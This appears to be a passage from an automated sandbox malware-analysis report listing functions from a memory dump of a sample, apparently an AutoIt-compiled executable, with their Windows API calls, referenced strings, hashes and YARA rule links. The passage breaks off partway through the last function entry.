Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 0401833A00014EBBCF525E84DD11DEE3F23BB58354B45841AFE1859131C33ADAB2AB89

Function 004B7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004B7A0D: __getptd_noexit.LIBCMT ref: 004B7A0E

__lock.LIBCMT ref: 004B748F
InterlockedDecrement.KERNEL32(?), ref: 004B74AC
_free.LIBCMT ref: 004B74BF
InterlockedIncrement.KERNEL32(01325528), ref: 004B74D7

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 21f5822eebbd2310fd8aea56a913da5e610857a699b874563299d516339c0d3a
Instruction ID: d19504a0e0031ac1723ff9a319eb70c4495b733ed2f240cc6f2c852b67ebba73
Opcode Fuzzy Hash: 21f5822eebbd2310fd8aea56a913da5e610857a699b874563299d516339c0d3a
Instruction Fuzzy Hash: 7E01E131909620ABD712AF2594097DEBF70BB8571AF15400BF814A7790C72C5900EFFA

Function 004B7A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 004B7AD8

Part of subcall function 004B7CF4: __mtinitlocknum.LIBCMT ref: 004B7D06
Part of subcall function 004B7CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 004B7D1F

InterlockedIncrement.KERNEL32(?), ref: 004B7AE5
__lock.LIBCMT ref: 004B7AF9
___addlocaleref.LIBCMT ref: 004B7B17

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: 88706832ad0611034822b9f6b922b39ff79aff0bec39a0422245dfd2e6c4d087
Instruction ID: a4196b9091836b66c8901604d8a49730494d2a1c0cdb2cbf1a808e63d37701db
Opcode Fuzzy Hash: 88706832ad0611034822b9f6b922b39ff79aff0bec39a0422245dfd2e6c4d087
Instruction Fuzzy Hash: 320161714447009FD720DF76D90578ABBF0EF54329F20890EA496976A0CB78A644CF25

Function 004FEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 004AAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004AAFE3
Part of subcall function 004AAF83: SelectObject.GDI32(?,00000000), ref: 004AAFF2
Part of subcall function 004AAF83: BeginPath.GDI32(?), ref: 004AB009
Part of subcall function 004AAF83: SelectObject.GDI32(?,00000000), ref: 004AB033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 004FEA8E
LineTo.GDI32(00000000,?,?), ref: 004FEA9B
EndPath.GDI32(00000000), ref: 004FEAAB
StrokePath.GDI32(00000000), ref: 004FEAB9

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 3e4b9b851623dc07c90518a93bcfa2e8f63d520a957078e53b57f20d7c433d62
Instruction ID: 6bbab04dd4000d87b1b0083d0977048fdba21e1788dd1a82bf7e75570da43d3e
Opcode Fuzzy Hash: 3e4b9b851623dc07c90518a93bcfa2e8f63d520a957078e53b57f20d7c433d62
Instruction Fuzzy Hash: 42F0B431001658BBDB125F94AC0DFCA3F256F2A311F048202FA01600E1C3785665EBAD

Function 004CC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004CC84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 004CC85D
GetCurrentThreadId.KERNEL32 ref: 004CC864
AttachThreadInput.USER32(00000000), ref: 004CC86B

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: dbb809c5837d42747a3f8b195630dd20215ba4b36df4cfefbc062f41b5d3e519
Instruction ID: e064ace109218f4a666c782987a1432ee1db315fe622ea1b7c0568794cb45840
Opcode Fuzzy Hash: dbb809c5837d42747a3f8b195630dd20215ba4b36df4cfefbc062f41b5d3e519
Instruction Fuzzy Hash: 02E0307514122476EB102B629C4DFDB7F6CEF157A1F408015F50D84450C7758985D7F0

Function 004CB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 004CB0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,004CAC9D), ref: 004CB0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004CAC9D), ref: 004CB0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,004CAC9D), ref: 004CB0F1

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: f903dc096906b4660c12af15a78c22c6a511dcc685c4409b862bf3097df09570
Instruction ID: 32cabc761663300b7fd79ca62f9027337165d1214f78760d28b4b851a00bb3ad
Opcode Fuzzy Hash: f903dc096906b4660c12af15a78c22c6a511dcc685c4409b862bf3097df09570
Instruction Fuzzy Hash: 99E08636601221ABD7605FB25C0DFDB3BB8EF65791F01C818F641D6040EB388409D770

Function 004AB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 004AB496
SetTextColor.GDI32(?,000000FF), ref: 004AB4A0
SetBkMode.GDI32(?,00000001), ref: 004AB4B5
GetStockObject.GDI32(00000005), ref: 004AB4BD
GetWindowDC.USER32(?,00000000), ref: 0050DE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0050DE38
GetPixel.GDI32(00000000,?,00000000), ref: 0050DE51
GetPixel.GDI32(00000000,00000000,?), ref: 0050DE6A
GetPixel.GDI32(00000000,?,?), ref: 0050DE8A
ReleaseDC.USER32(?,00000000), ref: 0050DE95

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 08e0cb817349079da591276f30419e5ce98528c5ad0c6385f7999772a0fc35c8
Instruction ID: a7dd8bc743f20c9d25e022b38382669a4e38f73df867f912984d3737d8f6cf6b
Opcode Fuzzy Hash: 08e0cb817349079da591276f30419e5ce98528c5ad0c6385f7999772a0fc35c8
Instruction Fuzzy Hash: 23E0ED31140240BADB216FB8EC09BD93F21AB66335F14C666F669580E2C7754985EB21

Function 0050B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0050B29A
GetDC.USER32(00000000), ref: 0050B2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0050B2C3
ReleaseDC.USER32 ref: 0050B2E2

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3263b80ef88ec0b3504cd1438ed37392a8eb02cf7c63056df33be6c591a4f51c
Instruction ID: ef9c685a4397ebe3520f11930c530e3104ac2606ae8ae95fc6671cabaeba3b69
Opcode Fuzzy Hash: 3263b80ef88ec0b3504cd1438ed37392a8eb02cf7c63056df33be6c591a4f51c
Instruction Fuzzy Hash: 5BE04FB5500204EFDB005FB0C84C6AE7BB8FB6C350F11C80AFC5A8B250DB789845AB64

Function 0050B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0050B2AE
GetDC.USER32(00000000), ref: 0050B2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0050B2C3
ReleaseDC.USER32 ref: 0050B2E2

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 4d65e1b6381db507bad7779d1f8d34d70e3c4eadb6d30ebf91e69dd4afae1f78
Instruction ID: 1b913d232eb7739e1d24592656049adb6d81d3d9133c94ee3dd0367b2e2eb4d0
Opcode Fuzzy Hash: 4d65e1b6381db507bad7779d1f8d34d70e3c4eadb6d30ebf91e69dd4afae1f78
Instruction Fuzzy Hash: AAE046B5500200EFDB005FB0C84C6AD7BB8EB6C360F11C80AF95A8B220DBB89805AB24

Function 004CDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 004CDEAA

Strings

Container, xrefs: 004CDE29
AutoIt3GUI, xrefs: 004CDE22

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 835a434f9f068afb0282589b132fc213ec9a37d15df4aeaa2266feb358450761
Instruction ID: a4956ad926733efe90c95a795a6333a0b094fbef248cafc17cb3996732001fb6
Opcode Fuzzy Hash: 835a434f9f068afb0282589b132fc213ec9a37d15df4aeaa2266feb358450761
Instruction Fuzzy Hash: A3913578A00601AFDB54DF64C884F6ABBF9BF49714F10846EF84ACB691DB74E841CB64

Function 004D290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 004D2A72

Strings

I/P, xrefs: 004D297F
I/P, xrefs: 004D29FC, 004D2A64, 004D2A12

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _wcscpy
String ID: I/P$I/P
API String ID: 3048848545-2876928067
Opcode ID: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
Instruction ID: 46f78b7310cf93d017986972bf6c7791ea7cd3d6de973e34ddde50f35ef6a36c
Opcode Fuzzy Hash: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
Instruction Fuzzy Hash: 6D412C71A00116AACF25DF99D1719FEBBB0EF28314F50405FE88167391D7B85E82C768

Function 004ABCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 004ABCDA
GlobalMemoryStatusEx.KERNEL32 ref: 004ABCF3

Strings

@, xrefs: 004ABCE8

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: f9ccf60fc9620635e83679c31a814f0f2a66aef07612b1871ad99e780b2c979b
Instruction ID: b4561e68c226ed96853209fab9a17befba5be9f28df0806a179c30b3b08dab56
Opcode Fuzzy Hash: f9ccf60fc9620635e83679c31a814f0f2a66aef07612b1871ad99e780b2c979b
Instruction Fuzzy Hash: 4B515871408744ABE320AF55D885BAFBBECFBA6358F41484EF1C8410A2EF7484ACD756

Function 004DC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 004944ED: __fread_nolock.LIBCMT ref: 0049450B

_wcscmp.LIBCMT ref: 004DC65D
_wcscmp.LIBCMT ref: 004DC670

Strings

FILE, xrefs: 004DC5A5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 8a22c1595753dc4f549f9227f28641e0b25be65dfe7a210a5ad6da63411298fa
Instruction ID: ca42ff112a06db1bf3f7e300748f086fbf239282530aba875074de552fe6c9f3
Opcode Fuzzy Hash: 8a22c1595753dc4f549f9227f28641e0b25be65dfe7a210a5ad6da63411298fa
Instruction Fuzzy Hash: FA41D772A0020ABADF109AA5DC95FDF7BB99F89718F00047BF601E6281D6789A05C755

Function 004FA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 004FA85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004FA86F

Strings

', xrefs: 004FA7C3

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 123c6551c3550e774d175675c5a908f189dbc0dee2eca45dc3f821f3fb375ca8
Instruction ID: 24089d59eb90f08652923db3ee17df28f0d3459467962e6ce8a87075399789fe
Opcode Fuzzy Hash: 123c6551c3550e774d175675c5a908f189dbc0dee2eca45dc3f821f3fb375ca8
Instruction Fuzzy Hash: 41410BB4E003099FDB14DF64C880BEA7BF5FB08344F14006AEA09AB341D774A956CFA5

Function 004F975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 004F980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004F984A

Strings

static, xrefs: 004F97AA

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: b539225e5d1936fa34bcec89b8f65917dcc2676c029dc66778dd2c78d1348573
Instruction ID: 46c2b2bdca605ae01a37272569ac5489f4b3125ea4caa0979c178e74d5449a4c
Opcode Fuzzy Hash: b539225e5d1936fa34bcec89b8f65917dcc2676c029dc66778dd2c78d1348573
Instruction Fuzzy Hash: E1319071110608AADB10AF75CC80BFB77B9FF59764F00861EF9A9C7150DA34AC81D768

Function 004D5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004D51C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004D5201

Strings

0, xrefs: 004D51BF

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 7226338c9884845e0c926f72a0808b8b3b39c2cd736a912df16cf5d74ae37bab
Instruction ID: 8ec351ac888db266b1158002a46b13c9112329a1c49611ab801561a715de86d8
Opcode Fuzzy Hash: 7226338c9884845e0c926f72a0808b8b3b39c2cd736a912df16cf5d74ae37bab
Instruction Fuzzy Hash: E531F531A007049BEB24CF99D859B9FBBF4EF45350F14005FE981A63A0DB789A48CF19

Function 004E658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 004E6608

Strings

AUTOITCALLVARIABLE%d, xrefs: 004E65FA
, $, xrefs: 004E6648

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 70713a01a7a9c2109e30d6b329c34e137cc8d327d39182a5a2e8132640ac1abf
Instruction ID: e92534df5b2d198586f45e7c75ce3f5172a0bd0adddf14c3ae553049315d9c69
Opcode Fuzzy Hash: 70713a01a7a9c2109e30d6b329c34e137cc8d327d39182a5a2e8132640ac1abf
Instruction Fuzzy Hash: EC21C531A00114AFCF11EF66C882EED7BB4BF55348F11046EF505AB151DB78EA05CBA9

Function 004F93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

